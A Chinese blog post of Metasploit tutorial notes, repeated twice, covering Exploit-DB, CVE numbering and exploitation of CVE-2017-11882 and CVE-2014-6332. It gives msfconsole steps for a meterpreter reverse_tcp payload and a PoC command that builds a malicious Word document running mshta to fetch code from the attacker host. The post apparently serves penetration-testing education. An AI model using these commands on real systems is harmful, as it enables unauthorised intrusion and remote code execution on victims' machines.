zoukankan      html  css  js  c++  java
  • 4.Metasploit框架更新

    Metasploit 进阶第二讲  框架更新

     

    EDB平台-互联网安全漏洞库

     

    Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况,同时帮助安全研究人员及渗透测试工程师进行更好的安全测试工作。

    https://www.exploit-db.com/

    exploits:漏洞信息

    papers:文章

    GHDB: Google hacking

    shellcodes:填充数据

     

     

    CVE-2017-11882介绍

    CVE-2017-11882Ofice远程代码执行漏洞:

     

    由Microsoft office中的公式编辑器造成,该模块以OLE(Object Linking and Embedding,对象链接与嵌入)技术将公式嵌入在Office文档内,由于编辑器没有对名称长度进行校验,导致缓冲区溢出,若攻击者通过构造特殊字符,office无法正确处理内存对象,成功利用该漏洞的攻击者将能以当前用户身份在目标操作系统执行任意代码。

    完美无弹窗,无异常,影响office全版本。

     

    CVEMS

     

    CVE是Common Vulnerabilities and Exposures的缩写,意思是公共漏洞及披露。它是一个漏洞字典,由MITRE维护,给每个暴露出来漏洞给一个公共的名称。可以在cve.mitre.org/cve/index.html中查看漏洞列表。

    MS是微软维护的自身的漏洞列表。可以在technet.microsoft.com/en-

    us/security/bulletins查找最新的各种相关信息。

    由于两者标准不统一,为了更好对应,MITRE提供一个对应列表cve.mitre.org/data/refs/refmap/source-MS.html。

    MSF添加exploit及更新Metasploit框架

    添加exploit:

    1.将下载的rb文件放入对应的文件夹下

    2.执行reload_all或重新启动MSF

    更新metasploit框架:

    apt update;apt install metasploit-framework

    实操:利用CVE-2017-11882攻击目标主机

    MSF:

    search  2017_11882

    use exploit/windows/...

    info 

    show options

    set uripath/

    set payload windows/meterpreter/reverse_tcp

    set lhost 192.168.24.137

    run

    生成POC程序(带有shell的doc文件):

    python CVE-2017-11882.py  -c“mshta

    http://192.168.24.137:8080/"-o11882.doc

      

    其他POC程序生成:

    https://github.com/Ridter/CVE-2017-11882 

    python  CVE-2017-11882.py-c"cmd.exe/c

    calc.cxe" –o 11882.doc

    metasploit攻击win8实例

    Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332、MS14-064):

    OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。

    Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008

    SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012

    Gold/R2,Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞,远程攻击者利用此漏洞构造特殊的网页,用户使用IE浏览器查看网页时允许远程执行任意代码。

    可能会遇到的问题:

    1.Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444) 

        lsof-i:4444  ->  kill  -9  PID(man  lsof  ->  man kill)

    2.注意查看报错信息,多检索

    metasploit框架打开方式:

    msfconsole         启动命令行模式

    armitage             启动图形化界面方式

    Metasploit 进阶第二讲

    框架更新

     

    01 Exploit_db平台介绍

    02 MSF添加exploit更新MSF

    03 CVE-2017-11882利用实例

    04合天网安实验室攻击win8实例

     

     

    EDB平台-互联网安全漏洞库

     

    Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况,同时帮助安全研究人员及渗透测试工程师进行更好的安全测试工作。

     

    https://www.exploit-db.com/

     

    exploits:漏洞信息

    papers:文章

    GHDB: Google hacking

    shellcodes:填充数据

     

     

    CVE-2017-11882介绍

     

    CVE-2017-11882Ofice远程代码执行漏洞:

     

    Microsoft office中的公式编辑器造成,该模块以OLEObject Linking and Embedding,对象链接与嵌入)技术将公式嵌入在Office文档内,由于编辑器没有对名称长度进行校验,导致缓冲区溢出,若攻击者通过构造特殊字符,office无法正确处理内存对象,成功利用该漏洞的攻击者将能以当前用户身份在目标操作系统执行任意代码。

    完美无弹窗,无异常,影响office全版本。

     

     

    CVEMS

     

    CVECommon Vulnerabilities and Exposures的缩写,意思是公共漏洞及披露。它是一个漏洞字典,由MITRE维护,给每个暴露出来漏洞给一个公共的名称。可以在cve.mitre.org/cve/index.html中查看漏洞列表。

     

    MS是微软维护的自身的漏洞列表。可以在technet.microsoft.com/en-

    us/security/bulletins查找最新的各种相关信息。

    由于两者标准不统一,为了更好对应,MITRE提供一个对应列表cve.mitre.org/data/refs/refmap/source-MS.html

     

    MSF添加exploit及更新Metasploit框架

     

    添加exploit

    1.将下载的rb文件放入对应的文件夹下

    2.执行reload_all或重新启动MSF

     

    更新metasploit框架:

    apt updateapt install metasploit-framework

    实操:利用CVE-2017-11882攻击目标主机

    MSF:

    search  2017_11882

    use exploit/windows/...

    info

    show options

    set uripath/

    set payload windows/meterpreter/reverse_tcp

     set lhost 192.168.24.137

    run

    生成POC程序(带有shell的doc文件):

    python CVE-2017-11882.py  -c“mshta

    http://192.168.24.137:8080/"-o11882.doc

    其他POC程序生成:

    https://github.com/Ridter/CVE-2017-11882

    python  CVE-2017-11882.py-c"cmd.exe/c

    calc.cxe" –o 11882.doc

    合天网安实验室:metasploit攻击win8实例

    Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332、MS14-064):

    OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。

    Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008

    SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012

    Gold/R2,Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞,远程攻击者利用此漏洞构造特殊的网页,用户使用IE浏览

    器查看网页时允许远程执行任意代码。

    可能会遇到的问题:

    1. Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)

    lsof-i:4444  ->  kill  -9  PID(man  lsof  ->  man kill)

    2.注意查看报错信息,多检索

    metasploit框架打开方式:

    msfconsole         启动命令行模式

    armitage             启动图形化界面方式

     

  • 相关阅读:
    将vue文件script代码抽取到单独的js文件
    git pull 提示错误:Your local changes to the following files would be overwritten by merge
    vue和uniapp 配置项目基础路径
    XAMPP Access forbidden! Access to the requested directory is only available from the local network.
    postman与newman集成
    postman生成代码段
    Curl命令
    POST方法的Content-type类型
    Selenium Grid 并行的Web测试
    pytorch转ONNX以及TnesorRT的坑
  • 原文地址:https://www.cnblogs.com/lvwuwa/p/11128894.html
Copyright © 2011-2022 走看看